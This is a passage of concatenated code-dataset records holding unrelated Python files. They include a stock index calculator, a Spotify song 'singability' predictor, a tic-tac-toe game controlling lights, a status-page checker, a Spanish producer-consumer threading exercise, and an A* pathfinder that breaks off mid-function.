xlsxwriter.Workbook('RST_lows_after_RST.xlsx')\nworksheet = workbook.add_worksheet()\n\ntotal_cols = len(final_list[1])\nfor row in range(len(final_list)):\n for col in range(total_cols):\n worksheet.write(row, col, final_list[row][col])\n\n# Add a format. Light red fill with dark red text.\nformat1 = workbook.add_format({'bg_color': '#FFC7CE',\n 'font_color': '#9C0006'})\n\n# # Add a format. Green fill with dark green text.\n# format2 = workbook.add_format({'bg_color': '#C6EFCE',\n# 'font_color': '#006100'})\n\n# Write a conditional format over a range.\nworksheet.conditional_format('L1:L'+str(len(final_list)), {'type': 'cell',\n 'criteria': '>=',\n 'value': 10,\n 'format': format1})\n\nworkbook.close()\n","sub_path":"python/Tracks/find_lows_spawned_after_an_RST.py","file_name":"find_lows_spawned_after_an_RST.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51810809","text":"#!/usr/bin/python\n# Python 2.7.4\n\n# Module: Color Library Module\n# Author: Unknown\n# Date: June 15, 2014\n\n__author__ = \"BlackSuitIT\"\n__author_email__ = \"Unknown\"\n__date__ = \"06-15-2014\"\n__version__ = \"0.0.2\"\n\nMODULE = {\n 'NAME' :'colors ', # Mod file name\n 'DESC' :'Creates a color class', # Mod descripton \n 'TYPE' :'CLASS', # Class\n }\n\n\n# Color Class\nclass col:\n header = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n yellow = '\\033[93m'\n red = '\\033[91m'\n clear = '\\033[0m'\n\n# Class import message\nprint('COLORS module\\t\\t\\t\\t' + col.blue + '[' + col.green + 'ok' + col.blue + '] ' + col.clear)\n","sub_path":"colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308019728","text":"#coding=utf-8\n#author=godpgf\nfrom .data_accessor import LocalDataProxy\nfrom .code_accessor import LocalCodeProxy\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ndef cal_market_data(stock_list):\n all_weight = 0\n weight_list = []\n for s in stock_list:\n data = s.bar\n cup = data[-1][4] * s.totals\n all_weight += cup\n weight_list.append(cup)\n if all_weight > 0:\n for i in range(len(weight_list)):\n weight_list[i] /= all_weight\n\n date = []\n open = []\n high = []\n low = []\n close = []\n volume = []\n turnover = []\n\n day_len = len(stock_list[0].bar)\n yestoday_is_use = [False] * len(stock_list)\n for i in range(day_len):\n openPrice = 0\n highPrice = 0\n lowPrice = 0\n closePrice = 0\n volumeValue = 0\n\n #先计算今天的开盘\n realOpenPrice = None\n if i > 0:\n #先用昨天有数据今天还有数据的股票计算出今天的开盘价\n lastOpenPrice = 0\n for j in range(len(stock_list)):\n if yestoday_is_use[j] and stock_list[j].bar[i][5] > 0:\n lastOpenPrice += stock_list[j].bar[i-1][1] * weight_list[j]\n openPrice += stock_list[j].bar[i][1] * weight_list[j]\n\n if lastOpenPrice != 0:\n realOpenPrice = openPrice * open[i-1] / lastOpenPrice\n else:\n #当遇到计算不出的情况取个近似\n realOpenPrice = close[i-1]\n openPrice = 0\n\n\n #计算为了得到这个开盘价所需要的缩放\n for j in range(len(stock_list)):\n yestoday_is_use[j] = False\n if stock_list[j].bar[i][5] > 0:\n openPrice += stock_list[j].bar[i][1] * weight_list[j]\n highPrice += stock_list[j].bar[i][2] * weight_list[j]\n lowPrice += stock_list[j].bar[i][3] * weight_list[j]\n closePrice += stock_list[j].bar[i][4] * weight_list[j]\n volumeValue += stock_list[j].bar[i][5] * weight_list[j]\n yestoday_is_use[j] = True\n\n if realOpenPrice:\n if volumeValue == 0:\n openPrice = close[i-1]\n highPrice = close[i-1]\n lowPrice = close[i-1]\n closePrice = close[i-1]\n else:\n k = realOpenPrice / openPrice\n openPrice *= k\n highPrice *= k\n lowPrice *= k\n closePrice *= k\n volumeValue *= k\n\n date.append( stock_list[0].bar[i][0] )\n open.append( openPrice )\n high.append( highPrice )\n low.append( lowPrice )\n close.append( closePrice )\n volume.append( volumeValue )\n turnover.append(0.0)\n\n\n stocktype = np.dtype([\n ('date', 'uint64'), ('open', 'float32'),\n ('high', 'float32'), ('low', 'float32'),\n ('close', 'float32'), ('price', 'float32'),\n ('volume', 'uint64'), ('turnover', 'float32')\n ])\n history_data = [(date[i], open[i], high[i], low[i], close[i], 0, volume[i], 0) for i in range(len(date))]\n return np.array(history_data, dtype=stocktype)\n\n\nclass StockData(object):\n def __init__(self, bar, market, industry, totals = 1, earning_ratios = 0):\n self.bar = bar\n self.market = market\n self.industry = industry\n self.totals = totals\n self.earning_ratios = earning_ratios\n\n\ndef download_stock_data(cache_path=\"data\", is_offline=False, min_date=\"2012-01-01\", is_real_time=False):\n codeProxy = LocalCodeProxy(cache_path, is_offline)\n codes = codeProxy.get_codes()\n dataProxy = LocalDataProxy(cache_path, is_offline, min_date)\n\n industry_map = {}\n markey_set = set()\n\n code_list = []\n price = []\n market = []\n industry = []\n days = []\n\n code_set = set()\n for index, row in codes.iterrows():\n if row[\"code\"] in code_set:\n continue\n code_set.add(row[\"code\"])\n data = dataProxy.get_all_data(row[\"code\"], is_real_time)\n if data is not None and len(data) > 0:\n code_list.append(row[\"code\"])\n price.append(row[\"price\"])\n market.append(row[\"market\"])\n markey_set.add(row['market'])\n industry.append(row[\"industry\"])\n days.append(dataProxy.get_trading_days(row[\"code\"]))\n dataProxy.get_all_data(row[\"market\"])\n if row[\"industry\"] not in industry_map:\n industry_map[row[\"industry\"]] = list()\n industry_map[row[\"industry\"]].append(StockData(data,\n row['market'],\n row['industry']))\n\n for key, value in industry_map.items():\n data = cal_market_data(value)\n df = pd.DataFrame({\"date\":data[\"date\"],\n \"open\":data[\"open\"],\n \"high\":data[\"high\"],\n \"low\":data[\"low\"],\n \"close\":data[\"close\"],\n \"volume\":data[\"volume\"],\n \"turnover\":data[\"turnover\"]}, columns=[\"date\",\"open\",\"high\",\"low\",\"close\",\"volume\",\"turn\"])\n code_list.append(key)\n price.append(data[\"close\"][-1])\n\n market.append(None)\n industry.append(key)\n days.append(len(data[\"date\"]))\n df.to_csv(\"%s/%s.csv\" % (cache_path, key), index=False)\n\n for market_code in markey_set:\n data = dataProxy.get_all_data(market_code)\n code_list.append(market_code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(None)\n days.append(dataProxy.get_trading_days(market_code))\n\n pd.DataFrame({\"code\": np.array(code_list),\n \"price\": np.array(price),\n \"market\": np.array(market),\n \"industry\": np.array(industry),\n \"days\": np.array(days)},\n columns=[\"code\", \"market\", \"industry\", \"price\", \"days\"]).to_csv('%s/%s.csv' % (cache_path, 'codes'), index=False)\n\n\ndef download_industry(code_list, market_code, path, min_date=\"2005-09-01\"):\n if not os.path.exists(path):\n os.mkdir(path)\n dataProxy = LocalDataProxy(path, min_date=min_date)\n price = []\n market = []\n industry = []\n days = []\n for code in code_list:\n data = dataProxy.get_all_data(code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(market_code)\n days.append(dataProxy.get_trading_days(code))\n\n if market_code:\n data = dataProxy.get_all_data(market_code)\n code_list.append(market_code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(None)\n days.append(dataProxy.get_trading_days(market_code))\n pd.DataFrame({\"code\": np.array(code_list),\n \"price\": np.array(price),\n \"market\": np.array(market),\n \"industry\": np.array(industry),\n \"days\":np.array(days)},\n columns=[\"code\", \"market\", \"industry\", \"price\", \"days\"]).to_csv('%s/%s.csv' % (path, 'codes'), index=False)","sub_path":"stdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150673125","text":"import pandas as pd\nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn import neighbors\nfrom sklearn import neural_network\nfrom sklearn.ensemble import RandomForestRegressor\nimport statsmodels.api as sm\nimport spotipy\nimport spotipy.util as util\nimport random\nimport csv\nimport private\nimport lyricsgenius\nimport textstat\nimport graphviz\n\ndef Train():\n columnNames = ['Name', 'Duration', 'Popularity', 'Key', 'Time Sig', 'Energy', 'Instrumentalness', 'Loudness', 'Tempo', 'LyricSimplicity', 'Sections', 'Singable']\n songs = pd.read_csv(r\"Resources\\TrainingData.csv\")\n trainingDataframe = DataFrame(songs, columns=columnNames)\n #scatterPlot(trainingDataframe)\n\n X = trainingDataframe[['Duration', 'Popularity', 'Key', 'Energy', 'Instrumentalness', 'Tempo', 'LyricSimplicity', 'Sections']]\n Y = trainingDataframe['Singable']\n\n regression = RandomForestRegressor(n_estimators=400, max_features=8, max_depth=None, min_samples_split=2)\n regression = regression.fit(X,Y)\n return regression\n\ndef Predict(regression):\n scope = 'user-library-read playlist-modify-public'\n token = util.prompt_for_user_token(private.spotifyUsername, scope, private.spotifyClientId, private.spotifyClientSecret, \"http://localhost\")\n spot = spotipy.Spotify(auth=token)\n\n if token:\n songUris = []\n playlist = spot.user_playlist_create(private.spotifyUserId, \"Singable\")\n while len(songUris) < 10:\n track = spot.current_user_saved_tracks(1, random.randint(0, 1268))\n song = track['items'][0]['track']\n \n # Don't want duplicate songs in this playlist\n if (song[\"uri\"] not in songUris):\n trackFeatures = spot.audio_features(song[\"uri\"])[0]\n trackAnalysis = spot.audio_analysis(song[\"uri\"])\n name = song[\"name\"]\n artist = song[\"artists\"][0][\"name\"]\n print(name)\n simplicity = LyricDifficulty(GetLyrics(name, artist))\n duration = song[\"duration_ms\"]\n popularity = song[\"popularity\"]\n key = trackFeatures[\"key\"]\n energy = trackFeatures[\"energy\"]\n instrumentalness = trackFeatures[\"instrumentalness\"]\n loudness = trackFeatures[\"loudness\"]\n tempo = trackFeatures[\"tempo\"]\n sections = len(trackAnalysis[\"sections\"])\n\n prediction = regression.predict([[duration, popularity, key, energy, instrumentalness, tempo, simplicity, sections]])\n # Checking for prediction confidence. > 60% and we'll add it to the playlist \n if (float(prediction[0]) > 0.60):\n songUris.append(song[\"uri\"])\n print(name + \" Prediction: \" + str(prediction))\n spot.user_playlist_add_tracks(private.spotifyUserId, playlist[\"id\"], songUris)\n\ndef scatterPlot(dataFrame):\n plt.scatter(dataFrame['Simplicity'], dataFrame['Singable'], color='red')\n plt.title(\"Simple VS Singable\", fontsize=14)\n plt.xlabel(\"Simple\", fontsize=14)\n plt.ylabel(\"Singable\")\n plt.grid(True)\n plt.show()\n\ndef ScrapeSongs():\n scope = 'user-library-read'\n token = util.prompt_for_user_token(private.spotifyUsername, scope, private.spotifyClientId, private.spotifyClientSecret, \"http://localhost\")\n\n if token:\n spot = spotipy.Spotify(auth=token)\n\n # We're grabbing 200 songs total, in batches of 5\n with open(\"TrainingData.csv\", \"w+\", newline='') as file:\n for i in range(0, 40):\n songUris = []\n totalSongs = spot.current_user_saved_tracks(1,0)[\"total\"]\n results = spot.current_user_saved_tracks(5, random.randint(0, totalSongs)) # 1268 is the total amount of songs I have, need to find a way to get this number dynamically\n\n for item in results['items']:\n if (item[\"track\"][\"uri\"] not in songUris):\n songUris.append(item['track']['uri'])\n tracks = spot.tracks(songUris)['tracks']\n trackFeatures = spot.audio_features(songUris)\n\n for i in range(0, len(tracks)):\n trackAnalysis = spot.audio_analysis(songUris[i])\n trackInfo = []\n trackInfo.append(tracks[i][\"name\"])\n trackInfo.append(tracks[i][\"duration_ms\"])\n trackInfo.append(tracks[i][\"popularity\"])\n trackInfo.append(trackFeatures[i][\"key\"])\n trackInfo.append(trackFeatures[i][\"time_signature\"])\n trackInfo.append(trackFeatures[i][\"energy\"])\n trackInfo.append(trackFeatures[i][\"instrumentalness\"])\n trackInfo.append(trackFeatures[i][\"loudness\"])\n trackInfo.append(trackFeatures[i][\"tempo\"])\n trackInfo.append(LyricDifficulty(GetLyrics(tracks[i][\"name\"], tracks[i][\"artists\"][0][\"name\"])))\n trackInfo.append(len(trackAnalysis[\"sections\"]))\n writer = csv.writer(file, delimiter=\",\")\n writer.writerow(trackInfo)\n print(len(songUris))\n\ndef GetLyrics(songName, songArtist):\n try:\n genius = lyricsgenius.Genius(private.geniusAccessToken)\n song = genius.search_song(songName, songArtist)\n if (song is not None):\n return song.lyrics\n return None\n except:\n return None\n\ndef LyricDifficulty(lyrics):\n if (lyrics is not None):\n return textstat.flesch_reading_ease(lyrics)\n return 0\n\n\nregression = Train()\nPredict(regression)\n#ScrapeSongs()\n#print(LyricDifficulty(GetLyrics(\"Hunter\", \"Tonedeff\")))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530830767","text":"\nimport random\nimport sys\nimport time\n\nimport http.client\nimport tornado.escape\n\nfrom PyQt4 import QtGui, QtCore\n\nimport playhouse\n\n\nbuttons = [[None] * 3 for _ in range(3)]\n\nbuffer = []\ndef set_state(x, y, **args):\n global buffer\n buffer += [{'x':x, 'y':y, 'change':args}]\n\ndef commit():\n global buffer\n conn = http.client.HTTPConnection(\"localhost:4711\")\n conn.request(\"POST\", \"/lights\", tornado.escape.json_encode(buffer))\n buffer = []\n\ndef main():\n for i in range(3):\n for j in range(3):\n set_state(i, j, sat=0, hue=0, bri=0)\n commit()\n \n app = QtGui.QApplication(sys.argv)\n \n window = QtGui.QMainWindow()\n window.setWindowTitle(\"Tic tac toe\")\n \n widget = QtGui.QWidget()\n widget.setStyleSheet(\"QPushButton { color: black }\")\n layout = QtGui.QGridLayout()\n \n for row in range(3):\n for column in range(3):\n def clicked(row, column):\n def action():\n do_turn(column, row)\n return action\n \n button = QtGui.QPushButton(\"{}:{}\".format(row, column))\n button.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n button.clicked.connect(clicked(row, column))\n button.setStyleSheet(\"QPushButton { background-color: white }\")\n buttons[row][column] = button\n layout.addWidget(button, row, column)\n \n widget.setLayout(layout)\n window.setCentralWidget(widget)\n \n window.show()\n \n app.exec()\n\n\n# ====== #\n\nplayer = 0\ncolors = [0, 45000]\nbutton_colors = [\"red\", \"blue\"]\n\nboard = [[-1, -1, -1],\n [-1, -1, -1],\n [-1, -1, -1]]\n\ntimer_running = False\n\ndef reset():\n global player, board, timer_running\n timer_running = False\n \n for i in range(3):\n for j in range(3):\n set_state(i, j, hue=0, sat=0)\n buttons[j][i].setStyleSheet(\"QPushButton { background-color: white }\")\n commit()\n board = [[-1, -1, -1],\n [-1, -1, -1],\n [-1, -1, -1]]\n player = 0\n\ndef do_turn(x, y):\n global player, timer_running\n if board[y][x] != -1 or timer_running:\n return\n board[y][x] = player\n set_state(x, y, hue=colors[player], sat=255)\n commit()\n buttons[y][x].setStyleSheet(\"QPushButton {{ background-color: {} }}\".format(button_colors[player]))\n \n winner_lamps = set()\n for configuration in [[(y, 0), (y, 1), (y, 2)],\n [(0, x), (1, x), (2, x)],\n [(0, 0), (1, 1), (2, 2)],\n [(0, 2), (1, 1), (2, 0)]]:\n if all(board[i][j] == player for i, j in configuration):\n winner_lamps.update(configuration)\n \n if len(winner_lamps) > 0:\n def set_alert():\n for i, j in winner_lamps:\n set_state(j, i, alert=\"lselect\")\n commit()\n QtCore.QTimer.singleShot(500, set_alert)\n timer_running = True\n QtCore.QTimer.singleShot(5000, reset)\n return\n if all(all(i != -1 for i in j) for j in board):\n reset()\n return\n \n player = 1 - player\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561441926","text":"from datetime import datetime as dt\nfrom sys import _getframe as gf\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nclass URLHandler(object):\n\n\tdef __init__(self,cfg_file,log,debug): # added debug \n\t\tself.min_h = cfg_file[\"urls_settings\"][\"lower_time_range\"][0]\n\t\tself.min_m = cfg_file[\"urls_settings\"][\"lower_time_range\"][1]\n\t\tself.min_s = cfg_file[\"urls_settings\"][\"lower_time_range\"][2]\n\n\t\tself.max_h = cfg_file[\"urls_settings\"][\"upper_time_range\"][0]\n\t\tself.max_m = cfg_file[\"urls_settings\"][\"upper_time_range\"][1]\n\t\tself.max_s = cfg_file[\"urls_settings\"][\"upper_time_range\"][2]\n\n\t\tself._log_buffer = list() # pushing msg for log inhere\n\t\tself._table_indices = cfg_file[\"table_indices\"]\n\t\tself._cfg = cfg_file\n\t\tself._log = log\n\t\tself._OK = True\n\t\tself.d = debug \n\t\n\tdef isOK(self):\n\t\t\"\"\" Return overall status for emails \"\"\"\n\t\treturn self._OK\n\n\tdef is_time_in_range(self,x):\n\t\tstart = dt.today().replace(hour=self.min_h,minute=self.min_m,second=self.min_s).timestamp()\n\t\tend = dt.today().replace(hour=self.max_h,minute=self.max_m,second=self.max_s).timestamp()\n\t\ts = x.strip().split(\" \")\n\t\tif '' in s:\n\t\t\ts.remove('')\n\t\ts1 = \"{} {}, {} {}\".format(s[1],s[2],s[4],s[3])\n\t\tx = dt.strptime(s1, \"%b %d, %Y %H:%M:%S\").timestamp()\n\t\treturn True if start < x and x < end else False\n\t\n\tdef flowstream_check(self,inst_cnt, str_time):\n\t\t\"\"\" Returns the status for Primary and Secondary Flowstream \"\"\"\n\t\treturn inst_cnt == \"1\" and self.is_time_in_range(str_time)\n\n\tdef wombat_check(self,lines_cnt):\n\t\t\"\"\" Returns the status for Wombat on market data consumption \"\"\"\n\t\treturn lines_cnt in self._table_indices[\"wombat\"][\"check\"]\n\n\tdef subscription_check(self,status):\n\t\t\"\"\" Returns cache status\"\"\"\n\t\treturn status in self._table_indices[\"rai_cache\"][\"check\"]\n\n\tdef raptor_ibm_check(self,status):\n\t\t\"\"\" Returns status for IBM and Raptor connections \"\"\"\n\t\treturn status in self._table_indices[\"ibm_rap_links\"][\"check\"]\n\n\tdef process_req(self):\n\t\tr = \"\" # request\n\t\tself.d.write(\" Line {} - Entering process_req(..)\\n\".format(gf().f_lineno),\"a\")\n\t\tfor i in self._cfg[\"urls\"]:\n\t\t\tif isinstance(self._cfg['urls'][i],str):\n\t\t\t\ttry:\n\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> FIRST 'try' block\\n\".format(gf().f_lineno),\"a\")\n\t\t\t\t\tr = get(self._cfg[\"urls\"][i])\n\t\t\t\t\tpage = BeautifulSoup(r.text, 'html.parser')\t\n\t\t\t\t\ttable = page.find_all(\"table\")\t\n\t\t\t\t\t# return iterator on rows and pass it to analyze(..)\t\n\t\t\t\t\t# 3 = table index; our page has 4 tables; our value is in the last one\t\t\n\t\t\t\t\trows = iter(table[3].find_all(\"tr\")) \n\t\t\t\t\tx = self.analyze(rows,i)\n\t\t\t\t\tif x[0]:\n\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < OK > \".ljust(15) + self._cfg[\"urls\"][i]\n\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < ERROR > \".ljust(15) + self._cfg[\"urls\"][i]\n\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\tself._OK = False\n\t\t\t\texcept BaseException as e:\n\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> Exception in FIRST 'try'\\n {}\".format(gf().f_lineno,e),\"a\")\n\t\t\telse:\n\t\t\t\tfor j in self._cfg['urls'][i]:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> SECONDS 'try' block\\n\".format(gf().f_lineno),\"a\")\n\t\t\t\t\t\tr = get(j)\n\t\t\t\t\t\tpage = BeautifulSoup(r.text, 'html.parser')\t\n\t\t\t\t\t\ttable = page.find_all(\"table\")\t\t\n\t\t\t\t\t\trows = iter(table[3].find_all(\"tr\")) \n\t\t\t\t\t\tx = self.analyze(rows,j)\n\t\t\t\t\t\tif x[0]:\n\t\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < OK > \".ljust(15) + j\n\t\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < ERROR > \".ljust(15) + j\n\t\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\t\tself._OK = False\n\t\t\t\t\texcept BaseException as e:\n\t\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> Exception in SECONDS 'try'\\n {}\".format(gf().f_lineno,e),\"a\")\n\t\tself._dump_log()\n\n\tdef analyze(self,row_iter, url_tag):\n\t\t\"\"\" Returns check result for each individual row \"\"\"\n\t\tself.d.write(\" Line {} - Entering analyze(..)\\n\".format(gf().f_lineno),\"a\")\n\t\tnext(row_iter)\n\t\tprime_cnt = 0\n\t\tfor row in row_iter:\n\t\t\tcells = [x.string.strip() for x in row.find_all(\"td\")]\n\t\t\tif url_tag == \"flowstream_prime\":\n\t\t\t\tif cells[0] in self._table_indices[url_tag][\"check\"]:\n\t\t\t\t\tcnt = cells[1] # instanceCount \n\t\t\t\t\ttime = cells[8] # startTime \n\t\t\t\t\tstat = self.flowstream_check(cnt,time)\n\t\t\t\t\tif not stat:\n\t\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\t\telif url_tag == \"flowstream_second\":\n\t\t\t\tif cells[0] in self._table_indices[url_tag][\"check\"]:\n\t\t\t\t\tcnt = cells[1] # instanceCount \n\t\t\t\t\ttime = cells[8] # startTime \n\t\t\t\t\tstat = self.flowstream_check(cnt,time)\n\t\t\t\t\tif not stat:\n\t\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\t\telif url_tag == \"wombat\":\n\t\t\t\treturn [self.wombat_check(cells[2]), \n\t\t\t\t\"ITRS - Validated.\" if self.wombat_check(cells[2]) else \"ITRS - Invalid data.\"]\n\t\t\telif url_tag == \"rai_cache\":\n\t\t\t\tif self.subscription_check(cells[1]):\n\t\t\t\t\tprime_cnt += 1\n\t\t\telif url_tag == \"ibm_rap_links\":\n\t\t\t\tif not self.raptor_ibm_check(cells[2]):\n\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \t\t\n\t\tif url_tag == \"rai_cache\" and prime_cnt != 2:\n\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\treturn [True, \"ITRS - Validated.\"]\n\n\tdef _dump_log(self):\n\t\t\"\"\" Writes the status of overall run for emails module \"\"\"\n\t\tself._log.header(\"urls\",65,\"w+\")\n\t\tself._log.write(self._log_buffer, \"a\")","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263840025","text":"import threading\nimport random\nimport logging\nimport time\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\"\"\"\n Clase listaFinita, extiende la clase list ([]) de modo que puede establecerse un limite máximo\n al tamaño (cantidad de objetos) de la lista.\n\n Uso:\n Declaración\n lista = listaFinita(Numero_Maximo_Items)\n # Crea una lista VACIA que admitirá hasta un máximo de Numero_Maximo_Items items\n\n El acceso a los elementos es igual que en una lista standard, la diferencia es que\n si se intenta agregar un elemento cuando la lista tiene Numero_Maximo_Items items, dara\n un mensaje de error y terminara el programa.\n\n Ejemplos\n Acceso al elemento i:\n\n a = lista[i]\n\n insertar un elemento en la posicón i.\n lista.insert(i, dato) # si i es mayor que Numero_Maximo_Items termina el programa y da error\n\n o\n\n lista[i] = dato # Si i es mayor que Numero_Maximo_Items termina el programa y da error.\n\n agregar un elemento al final de la lista\n\n lista.append(dato) # Si la lista tiene Numero_Maximo_Items termina el programa y da error.\n\n\"\"\"\n\nclass listaFinita(list):\n\n def __init__(self, max_elementos):\n self.max_elementos = max_elementos\n super().__init__()\n\n def pop(self, index):\n assert len(self) != 0, \"lista vacia\"\n return super().pop(index)\n\n def append(self, item):\n assert len(self) < self.max_elementos,\"lista llena\"\n super().append(item)\n\n def insert(self, index, item):\n assert index < self.max_elementos, \"indice invalido\"\n super().insert(index, item)\n\n def full(self):\n if len(self) == self.max_elementos:\n return True\n else:\n return False\n\n\nclass Productor(threading.Thread):\n paises = [(\"España\",\"Madrid\"),(\"Francia\",\"Paris\"),(\"Italia\",\"Roma\"),(\"Inglaterra\",\"Londres\"),(\"Alemania\",\"Berlin\"),(\"Rusia\",\"Moscu\"),\n (\"Turquia\",\"Istambul\"),(\"China\",\"Pekin\"),(\"Japon\",\"Tokio\"),(\"Emiratos Arabes\",\"Dubai\"),(\"Argentina\",\"Buenos Aires\"),\n (\"Brasil\",\"Brasilia\"),(\"Colombia\",\"Bogota\"),(\"Uruguay\",\"Montevideo\")]\n\n def __init__(self, lista, lockLleno):\n super().__init__()\n self.lista = lista\n self.lockLleno = lockLleno\n\n #Seccion critica debido a, al igual que productor y consumidor del ejercicio anterior, productor quiere consumir un recurso que no se produjo\n def run(self):\n while True:\n self.lockLleno.acquire()\n try:\n while self.lista.full():\n pass\n self.lista.append(self.paises[random.randint(0,len(self.paises)-1)])\n logging.info(f'produjo el item: {self.lista[-1]}')\n time.sleep(random.randint(1,5))\n finally:\n self.lockLleno.release()\n\n\nclass Consumidor(threading.Thread):\n def __init__(self, lista, lockVacio):\n super().__init__()\n self.lista = lista\n self.lockVacio = lockVacio\n\n\n def run(self):\n while True:\n self.lockVacio.acquire()\n try:\n while len(self.lista) == 0:\n pass\n elemento = self.lista.pop(0)\n logging.info(f'La capital de {elemento[0]} es {elemento[1]}')\n time.sleep(random.randint(1,5))\n finally:\n self.lockVacio.release()\n\ndef main():\n hilos = []\n lista = listaFinita(4)\n #a diferencia del consumidor ejecicio primario, en este se realiza de forma polimofica, y se colocan dos Lock\n #en los runs de la clases, para que el productor pueda llenar la lista se aplica antes de que pueda cargar y despues para entregar el recurso\n #se pregunta si esta lleno desactiva el lock\n #a cambio de consumidorque libera una vez el tamaño de la lista sea = 0\n lockLleno = threading.Lock()\n lockVacio = threading.Lock()\n\n for i in range(4):\n productor = Productor(lista, lockLleno)\n consumidor = Consumidor(lista, lockVacio)\n hilos.append(productor)\n hilos.append(consumidor)\n #con logging info, se busca los valores del thread que se pasa como paramentro en la Clase\n logging.info(f'Arrancando productor {productor.name}')\n productor.start()\n\n logging.info(f'Arrancando productor {consumidor.name}')\n consumidor.start()\n #los treads se agregan a una lista, despues iteramos la lista de threads para poder ejec join para que corran juntos\n for h in hilos:\n h.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Productor_Consumidor_1-Ejercicio2-Resuelto.py","file_name":"Productor_Consumidor_1-Ejercicio2-Resuelto.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"130187454","text":"from pygame.locals import *\nimport pygame\nimport sys\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nORANGE = (233, 163, 38)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nWINDOW_HEIGHT = 800\nWINDOW_WIDTH = 800\n\n\ndef drawGrid(maze):\n blockSize = 80\n for x in range(0, 800, blockSize):\n for y in range(0, 800, blockSize):\n rect = pygame.Rect(x, y, blockSize, blockSize)\n if maze[y//80][x//80] == 1:\n SCREEN.fill(RED, rect)\n elif maze[y//80][x//80] == 2:\n SCREEN.fill(ORANGE, rect)\n else:\n pygame.draw.rect(SCREEN, BLACK, rect, 1)\n\n\ndef drawAnswerGrid(maze, path):\n blockSize = 80\n for x in range(0, 800, blockSize):\n for y in range(0, 800, blockSize):\n rect = pygame.Rect(x, y, blockSize, blockSize)\n if maze[y//80][x//80] == 1:\n SCREEN.fill(RED, rect)\n else:\n pygame.draw.rect(SCREEN, BLACK, rect, 1)\n for t in path:\n rect = pygame.Rect(t[1] * 80, t[0] * 80, blockSize, blockSize)\n SCREEN.fill(GREEN, rect)\n\n\n# Calculate the shortest path\n\n\nclass Node():\n \"\"\"A node class for A* Pathfinding\"\"\"\n\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n\n self.g = 0\n self.h = 0\n self.f = 0\n\n def __eq__(self, other):\n return self.position == other.position\n\n\ndef astar(maze, start, end):\n start_node = Node(None, start)\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, end)\n end_node.g = end_node.h = end_node.f = 0\n\n # Initialize both open and closed list\n open_list = []\n closed_list = []\n\n # Add the start node\n open_list.append(start_node)\n\n while len(open_list) > 0:\n\n # Get the current node\n current_node = open_list[0]\n current_index = 0\n for index, item in enumerate(open_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n\n # Pop current off open list, add to closed list\n open_list.pop(current_index)\n closed_list.append(current_node)\n\n # Found the goal\n if current_node == end_node:\n path = []\n current = current_node\n while current is not None:\n path.append(current.position)\n current = current.parent\n return path[::-1] # Return reversed path\n\n # Generate children\n children = []\n # Adjacent squares\n for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)]:\n\n # Get node position\n node_position = (\n current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n\n # Make sure within range\n if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) - 1) or node_position[1] < 0:\n continue\n\n # Make sure walkable terrain\n if maze[node_position[0]][node_position[1]] != 0:\n continue\n\n # 